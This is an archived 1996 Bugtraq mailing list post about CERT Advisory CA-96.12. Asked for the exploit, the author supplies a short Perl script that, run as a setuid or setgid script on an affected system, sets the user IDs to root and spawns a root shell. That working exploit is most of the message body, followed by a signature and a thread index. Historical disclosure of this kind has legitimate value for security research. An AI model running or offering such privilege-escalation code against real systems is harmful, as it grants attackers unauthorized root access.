Bugtraq mailing list archives
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
From: jlewis () inorganic5 fdt net (Jon Lewis)
Date: Sat, 29 Jun 1996 02:24:49 -0400
On Fri, 28 Jun 1996 ichudov () algebra com wrote:
What is the exploit?
Run this as a suid or sgid script. It doesn't matter what user or group
it's suid/sgid to...it gets root access.
#!/usr/bin/perl
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");
Is it just me...or does it give people the willies knowing such an easy
to exploit hole was on their systems...perhaps for years.
------------------------------------------------------------------
Jon Lewis | Mime attachments are OK
jlewis () inorganic5 fdt net | But please ask before sending
http://inorganic5.fdt.net | unsolicited huge files.
________Finger jlewis () inorganic5 fdt net for PGP public key_______
Current thread:
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 28)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Brian Tao (Jun 29)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Andrew Liles (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Casper Dik (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Andrew Liles (Jun 30)
- Validating email sender Brendan McKenna (Jun 30)
- Re: Validating email sender Squidge (Jun 30)
- Re: Validating email sender Alan Brown (Jun 30)
- Re: Validating email sender Casper Dik (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Brian Tao (Jun 29)
- portmapper dangers der Mouse (Jun 30)
- Re: portmapper dangers Julian Assange (Jun 30)